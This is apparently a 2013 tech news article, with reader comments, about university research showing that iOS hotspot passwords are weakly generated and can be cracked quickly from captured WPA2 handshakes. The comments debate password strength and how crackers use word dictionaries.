Print 19 comment(s) - last by ProZach.. on Jun 20 at 4:46 PM

Refined version of attack using collected WPA2 handshakes can succeed in

Security researchers at Germany's Friedrich-Alexander-Universität Erlangen-Nürnberg (FAU) (located in Bavaria) have shown how surprising insecure hotspot password autogeneration is for Apple, Inc.'s (AAPL) iOS.

Using an iOS app written in Apple's own Xcode programming environment, the team set to work analyzing the words that Apple uses to generate its security keys.  Apple's hotspot uses a standard WPA2-type process, which includes the creation and passing of pre-shared keys (PSK).

The problem, is that the keys are generated based on small list of "random" words -- around 1,842 by the German teams' estimates.  Further, the random generator used is poor, so some words are picked more often than others.  Thus most hotspot passwords can be cracked very fast -- sometimes in as little as "50 seconds", according to the team.

iOS hotspot iOS hotspot

The team describes their app, available here, writing:

This app assists in generating an iOS hotspot cracking word list, which might be used in subsequent attacks on other hotspot users. The app also gives explanations and hints on how to crack a captured WPA2 handshake using well-known password crackers. Future releases might also automate the process of capturing and cracking hotspot passwords. As computing power on smart devices is limited, one solution is to involve online password cracking services like CloudCracker, to crack hotspot passwords on-the-fly.

Apple has a bit of a history of poor security awareness when it comes to passwords; at one point it was storing the passwords for some OS X features in plaintext.  But less Apple be singled out too much for admonishment, the team also writes that other mobile operating systems appear to have similar flaws.  The team writes, "Spot tests show that other mobile platforms are also affected by similar problems. We conclude that more care should be taken to create secure passwords even in PSK scenarios."

Thus it's quite possible that similar security flaws could exist in Google Inc.'s (GOOG) Android, which could be even worse, in practice, thanks to carriers' sluggish pace of security updates for Android.

In recent months hackers have also announced upcoming presentations on how to gain root access to iPhones via malicious (USB) chargers.

Source: FAU [Germany]

Comments     Threshold

This article is over a month old, voting and posting comments is disabled

By TheEinstein on 6/19/2013 4:40:19 PM , Rating: 2
With variable length words some words will naturally be less occuring and other smaller ones will occur more often in a fixed length password.

Not using a number or two is also troubling as those can quickly add to the potential variables.

Of course someone will want symbols to which I say "hogwash". just increase the length so the user has an option of using a saying popular with them "2beornot2beisthequestion" is to be sufficiently difficult for some hacker to guess. on a side note I need a new password... does "thereisnosuchthingas2muchbeer" sound good?

RE: hmmm
By MERKJONES on 6/19/2013 4:54:02 PM , Rating: 2
That's actually my old password. As I got older and higher level into IT I swapped beer for whiskey.

RE: hmmm
By marvdmartian on 6/20/2013 7:52:09 AM , Rating: 3
Still better than my password, which is 12345. Coincidentally, that's the same password I use on my luggage locks!

RE: hmmm
By toffty on 6/20/2013 1:13:57 PM , Rating: 2
Mine is impossible to crack! It's "apassword"

You see, hackers assume it's "password" but never think to add "a" before it!

RE: hmmm
By bitterman0 on 6/20/2013 2:38:04 PM , Rating: 2
Nice Spaceballs reference!

RE: hmmm
By fic2 on 6/19/2013 4:58:55 PM , Rating: 2
You should read the Ars password hacking series of articles. It is pretty eye opening as to how fast hackers and gpus can crack even hashed passwords. Using words with number substitutes for "for/4" and "two/too/2" is one of the patterns they crunch through. Also, numbers as letters (e/E/3, S/s/5, o/O/0) and numbers separating words.

One hacker unscrambled about 13,500 of 16,500 hashes in an hour.

RE: hmmm
By ritualm on 6/19/2013 7:51:30 PM , Rating: 2
The best password is also one that is all but impossible for most humans to remember without external assistance / neural implants.

In other words, your proposed long password is too easy to figure out.

RE: hmmm
By TheEinstein on 6/19/2013 11:37:39 PM , Rating: 2

900,000 words in the English Language

Thereisnosuchthingas2muchbeer consists of 9 words (1 altered)

Brute forcing it consists of 29 characters of which if just caps, numbers and letters means roughly 90 total options.

Using words it is 900000^9 total outcomes
Using brute force it is 90^29 total outcomes.

Oh wait, thats not correct. you see a hacker has to assume smaller outcomes as well, so now we have:

Words: (900000^9)+(900000^8)+(900000^7)+(900000^6)+(900000 ^5) (we will assume 5 minimum words)

Letters (90^40)+(90^39)+(90^38)...(90^12)+(90^11)+(90^10)

Ofc they start small and work their way up so they wont ever hit the maximum.

However words can be trumped by an on prupose typo which is known the typist.

Even assuming a 10gigabyte/sec connection with substandard security (no limits on tries) and a network able to maximize number of efforts this is still a daunting task.

Also remember word based password cracking requires bandwidth per letter of the words, it literally takes far longer with a long password than brute forcing a minute 6 character password.

My preview shows a lot of bold but I am not using a < tag > there...

RE: hmmm
By ComputerJuice on 6/20/2013 3:09:22 AM , Rating: 1
Everythings gone bold! Bitchin!

RE: hmmm
By maugrimtr on 6/20/2013 8:57:00 AM , Rating: 2
It's bold because the input filter is misbehaving

Try it now ;).

RE: hmmm
By Solandri on 6/20/2013 1:50:44 PM , Rating: 3
Yours is the "safety in numbers" reasoning that password crackers love.

Those 900000 words don't all have an equal frequency of usage. About 40,000 of them are used 99% of the time. It'd be foolish for crackers to waste their time on the other 860,000 just to crack an extra 1% of passwords, so they don't even bother.

About 6,000 words are used about 90% of the time. An additional 85% reduction in solution space for a loss of just 9% possible solutions is a pretty good trade-off. So they'll probably do that too.

At this point it becomes a matter of prioritization. Start searching for passphrases using common words, then work your way up through the uncommon words as time permits. Here are the frequency ranks for the words in your 9-word password:

There - #45
is - #14
no - #41
such - #414
thing - #131
as - #153
too - #189
much - #253
beer - #2887

So beer is actually your most difficult word, and falls in the sub-3000 word dictionary.

The too/2 substitution is so common it provides almost zero protection. Crackers check for it as a matter of course. Same thing for first-letter capitalization. That's the second-most common pattern after all-lowercase.

"There is no such thing" is actually a common phrase. Like Google, password crackers build up huge libraries of commonly used terms and phrases, based on the passwords they've cracked. So Thereisnosuchthing would probably only count as a single word in a ~10,000 word/phrase dictionary. Same for toomuch.

So now your mighty password is actually only 4 "words" out of a 10000 word/phrase dictionary, meaning it can be found by searching only 10000^4 passphrases.

Most cracking is done offline - they download the password hash file of a server they've compromised, and work on it at home. A modern high-end GPU can crunch through about a billion hashes a second for a poor hash which is inexplicably still widely use. So your passphrase will fall in about 115 days. If they're serious and have a cluster of GPUs, they're gonna figure it out in less than a day.

Passwords are as much psychological as they are algorithmic. Making a secure password means doing things other people don't do. Make your password as different as possible from the passwords most crackers have run across. Use symbols because most people hate typing them, capitalize randomly, insert meaningless numbers multiple times (i.e. no l33t), avoid common phrases, misspell words in ways they aren't normally misxpelted, mix in a couple infrequently used words like something from Chaucer or a foreign language, etc.

Or as someone below suggests, just use a password manager like lastpass/keepass.

RE: hmmm
By Reclaimer77 on 6/20/2013 2:38:24 AM , Rating: 2
Neural implants? Pssha! I say positronic!

The ULTIMATE password.

"Common GPU cluster"
By half_duplex on 6/20/2013 12:36:44 AM , Rating: 3
I like how the app says "...using a common GPU cluster...".

Yes, because hackers are going to follow iOS users around with their GPU cluster waiting to brute force the iPhone hot spot.

This article is bull shit, even is someone did come to play with a cluster of GPUs, I highly doubt any iOS device could field the requests.

Sillyness. Don't these people have anything better to do?

RE: "Common GPU cluster"
By BRB29 on 6/20/2013 7:51:14 AM , Rating: 1
lol every time I read a BS article, I have to check the author. It seems to be the same one every time.

RE: "Common GPU cluster"
By Shadowself on 6/20/2013 8:59:22 AM , Rating: 3
Not surprising.

It's just Jason going off on Apple again: stick up an inflamatory headline about how bad Apple's iOS security is then bury near the end of the article the fact that virtually every other mobile OS is likely a bad or worse. Typical Jason.

In Jason's defense, most of his articles are not pure BS. They just have a Jason slant. Just read them with your well developed Jason filter set to "HIGH" or "EXTREME" depending upon your personal tastes.

RE: "Common GPU cluster"
By half_duplex on 6/20/2013 9:42:29 AM , Rating: 2
Well, it's not Jason Mick bias or anit-Apple slant that this article sadly exposes, it's his fundamental lack of understanding of the situation that is the problem.

Apple or not, to the infrequent or first time visitor, this type of article is a major red flag as to the quality and validity of the site as a whole.

When the title says the password was cracked in 50 seconds, and you read only to find out that isn't the case at all...

Make you wonder if the original article that this article cites was truly comprehended.

RE: "Common GPU cluster"
By BRB29 on 6/20/2013 9:46:10 AM , Rating: 2
pure BS to most people is sensationalism to Jason

By Azethoth on 6/19/2013 8:48:41 PM , Rating: 2
Fortunately we can use LastPass (or similar programs) to generate long and random passwords for us and then store them encrypted by our one true strong password that we can remember.

Faster than a summary header
By ProZach on 6/20/2013 4:46:23 PM , Rating: 2
Refined version of attack using collected WPA2 handshakes can succeed in

Lol, it's even fast enough to cut this sentence shor-

"Nowadays you can buy a CPU cheaper than the CPU fan." -- Unnamed AMD executive

Copyright 2016 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki